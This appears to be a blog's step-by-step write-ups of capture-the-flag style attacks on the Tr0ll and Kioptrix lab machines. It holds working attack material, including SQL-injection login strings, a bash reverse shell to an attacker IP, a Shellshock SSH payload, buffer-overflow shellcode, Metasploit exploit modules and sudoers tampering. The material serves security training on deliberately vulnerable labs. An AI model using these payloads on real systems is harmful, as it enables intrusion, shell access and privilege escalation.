Tag: apache vulnerability

Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple, gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

”’

2) nikto -h 192.168.189.197
# It found a ‘/secret/’ directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let’s try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We’re in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on ‘good_luck’ -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
12) Click on ‘this_folder_contains_the_password/’ -> Pass.txt
# Note: Either ‘Pass.txt’ or its contents ‘Good_job_:)’ could be the password
13) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in
14) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We’re in
15) cat root/Proof.txt
# Permission denied, we’re going to have to do privilege escalation
16) find / -perm -o+w
# Searching for world writable files
# That /lib/log/cleaner.py file near the end looks interesting
17) vi /lib/log/cleaner.py
Modify the try:
os.system(‘usermod -aG sudo overflow’)

# Initially the modification didn’t seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
18) id
# Became a sudoer
19) sudo ls /root
20) sudo cat /root/proof.txt
# Got the flag

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.

 

Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

”’

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
”’
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

”’

4) wfuzz –hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories – only index came up

5) Browse to: http://192.168.189.204/robots.txt

6) wfuzz –hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

”’
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
”’

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) cat answer.txt | base64 -d > the_answer.txt
12) gedit the_answer.txt
# It’s a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It’s password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out “TRY HARDER LOL!” and closes the connection
# Looks like it’s forcing this command (echo) to be run once we log in

20) Search for ‘ssh exploit’
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# We can use the shellshock exploit to run other commands

22) ssh noob@192.168.189.204 -i noob ‘() { :;}; /bin/bash’
23) id
# We’re in
24) pwd -> cd ../ -> ls -> ls tr0ll
# There’s a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
”’
After running all three files, we get the following:
– door1 r00t lets us input data
– door2 prints:
Good job, stand by, executing root shell…
BUHAHAHA NOOB!

– door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let’s go with door1. Binary exploitation?
”’

29) cd door1
30) gdb -q ./r00t
31) run $(python -c ‘print “A” * 500’)
# We get a segmentation fault
32) run $(python -c ‘print “A” * 300’)
33) run $(python -c ‘print “A” * 200’)
34) run $(python -c ‘print “A” * 250’)
35) run $(python -c ‘print “A” * 270’)
36) run $(python -c ‘print “A” * 268 + “B” * 4’)
# We control EIP

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c ‘print “A” * 268 + “B” * 4′)
40) x/100x $esp
”’
Notice where our A’s start
We can now load and run our shellcode

Let’s use execve /bin/sh shellcode I wrote, which is 25 bytes in size
”’

41) run $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)
# Confirming it works

42) ./r00t $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4

End-Notes:
Fun box!

Index

This is a sticky post. Below you can find links to all of my write-ups.

Return Oriented Programming Series

Web Exploitation

Binary Exploitation

Reverse Engineering

Capture the Flags

General Network Exploitation

Offensive Security Certified Professional (OSCP) Journey

Programs:

 

I will keep updating this post, adding more links as I add more write-ups.

Kioptrix Write-Up

What follows is a write-up of several vulnerable machines, Kioptrix #1 through #5.

The object of the game is to acquire root access via any means possible.
The purpose of the games is to practice techniques in vulnerability assessment and exploitation. There are multiple ways to get root access and compromise the system.

These machines are run in a host-only setup, as they are full of vulnerabilities and internet access would be dangerous.

[*] STATUS: COMPLETED

Kioptrix 1 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
”’
Scan for address and open ports

Note the following two services:
Samba smbd
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

These two could be our way in
”’

2) enum4linux 192.168.189.185
# Note: Server=[Samba 2.2.1a]
3) nikto -h 192.168.189.185
# We find a lot of vulnerabilities

4) Search Google for: Samba 2.2.1 exploit
# The first result is a verified remote execution exploit
5) wget https://www.exploit-db.com/download/10
6) mv 10 samba_228_remote.c
7) gcc -o samba_228_remote samba_228_remote.c
8) ./samba_228_remote
9) ./samba_228_remote -b 0 -c 192.168.189.130 192.168.189.185
10) whoami
# We got root
11) cat /var/mail/root
# We own this machine

 

Kioptrix 2 Write-Up

1) nmap -sS -sV -Pn 192.168.0.0/24
”’
Scan for address and open ports

Note the following three services:
Apache httpd 2.0.52 ((CentOS))
CUPS 1.1
MySQL (unauthorized)

These three could be our way in
”’

2) Browse to: 192.168.0.20
username: admin
password: ‘ or ‘1’=’1
# We’re in

3) ping localhost; ls
# The application is vulnerable to command injection

4) nc -n -v -l -p 443
5) In the browser: ping localhost; bash -i >& /dev/tcp/192.168.0.19/443 0>&1
6) id
# We got a shell, but not as a privileged user
7) Search: linux centos exploit
# The second result is for privilege escalation – just what we need

8) cd /tmp
9) wget https://www.exploit-db.com/download/9545 –no-check-certificate
10) mv 9545 centos_escalate.c
11) gcc -o centos_escalate centos_escalate.c
12) ./centos_escalate
13) whoami
# We got root

 

Kioptrix 3 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
2) gedit /etc/hosts
Add:
<ip> kioptrix3.com
192.168.189.195 kioptrix3.com

3) Browse to kioptrix3.com
4) Right-click -> View Page Source Code
# Notice the use of LotusCMS
5) Search: lotuscms exploit
# The third result is for eval() remote command execution
# Exploit: https://www.exploit-db.com/exploits/18565/
6) Start Metasploit
7) search LotusCMS
8) use exploit/multi/http/lcms_php_exec
9) options
10) set RHOST 192.168.189.195
11) set URI /
12) exploit
13) ls
# Remember they were talking about the gallery
# Let’s check it out
14) ls gallery
15) cat/gallery.gconfig.php
# Notice the credentials: root:fuckeyou
16) Browse to: http://kioptrix3.com/phpmyadmin/index.php -> Enter the above credentials
17) Gallery -> dev_accounts
# Note the hashes
17) Browse to: https://hashkiller.co.uk/md5-decrypter.aspx
Enter the hash: 5badcaf789d3d1d09794d8f021f40f0e
Result: starwars

18) ssh loneferret@192.168.189.195 -> Enter the password: starwars
19) cat CompanyPolicy.README
20) /usr/local/bin/ht
# I got an error: Error opening terminal: xterm-256color
# I solved it by entering: export TERM=xterm
21) /usr/local/bin/ht
22) Fn+F3 -> /etc/sudoers -> Enter
23) Under ‘User privilege specification’ add to loneferret: /bin/bash
24) sudo /bin/bash
25) whoami
# We got root
26) cd /root
27) cat Congrats.txt

 

Kioptrix 4 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
”’
Note the following services:
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

They could be our way in.

”’

2) enum4linux -a 192.168.189.196
”’
Note the users:
Account: nobody Name: nobody
Account: robert Name: ,,,
Account: root Name: root
Account: john Name: ,,,
loneferret Name: loneferret,,,

We can try using one of these accounts

”’

3) Browse to: 192.168.189.196
user: robert
pass: ‘ or ‘1’=’1

# Note the password: ADGAdsafdfwt4gadfga==
# Since ssh is also on and the web page isn’t showing much else, we can try that

4) ssh robert@192.168.189.196
5) ?
# Checking out what we can use

6) echo os.system(‘/bin/bash’)
7) ps aux | grep root
# Note that MySQL is running with root privileges
8) mysql
9) select sys_exec(“echo ‘robert ALL=(ALL) ALL’>> /etc/sudoers”);
# Adding “our” account to sudoers
10) exit
11) sudo bash
12) id
# We got root
13) cat /root/congrats.txt
Side-note:
Initially I also searched for “ubuntu 5.6 exploit” and thought of using the following exploit: https://www.exploit-db.com/papers/15311/

That might also be another way in.

 

Kioptrix 5 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.0.0/24
”’
Note the following:
Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

It’s open in both port 80 and port 8080.

”’

2) Browse to: 192.168.0.85
3) Right-click -> View Page Source Code
# Notice: URL=pChart2.1.3/index.php”
4) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php
5) Search: pChart2.1.3
6) Read: https://www.exploit-db.com/exploits/31173/
# Let’s try directory traversal
7) Browse to: 192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
# The web app is vulnerable to directory traversal

8) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

”’
Notice at the end of the file:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2″>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Apparently we can get in if we set the UserAgent to Mozilla 4

”’

9) Search: mozilla firefox 4.0 user agent string
10) Browse to: http://www.useragentstring.com/pages/useragentstring.php?name=Firefox
11) Ctrl-F -> mozilla/4.0 -> http://www.useragentstring.com/index.php?id=19040
12) In User Agent Switcher:
Edit User Agents
New
Description: Mozilla FireFox 4.0
User Agent:
Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)

13) Browse to: http://192.168.0.85:8080/
14) Click on ‘phptax’
15) Open Metasploit -> search phptax -> use exploit/multi/http/phptax_exec
16) show options -> set RHOST 192.168.0.85 -> set RPORT 8080 -> exploit
17) id
18) uname -a
# Getting kernel details to figure out how to do privilege escalation

19) Search: FreeBSD 9.0 exploit
# The first result is what we’re looking for
# https://www.exploit-db.com/exploits/28718/

20) wget https://www.exploit-db.com/download/28718
# Downloading it to our machine
21) mv 28718 freeBSD9_priv_esc.c
22) nc -lvp 8888 < freeBSD9_priv_esc.c
# Hosting the exploit on our machine
# We will download the file from the limited shell

23) nc -nv 192.168.0.87 8888 > die.c
24) Stop nc
24) gcc die.c -o die
25) ./die
26) id
# We got root
27) cat /root/congrats.txt
28) cat /root/ossec-alerts.log
”’
For fun, check out how noisy we were during our attack
As the congrats.txt explains, figuring out how to approach and attack the target before actually attacking is extremely important. Otherwise you will make a lot of noise and get caught early on as a result.
”’

 

End-Notes:

Very fun machines to exploit. As the Kioptrix website clearly states, they are intended for beginners, hence they are easy to exploit to the seasoned security tester. A big thanks to loneferret for such fun yet educational challenges!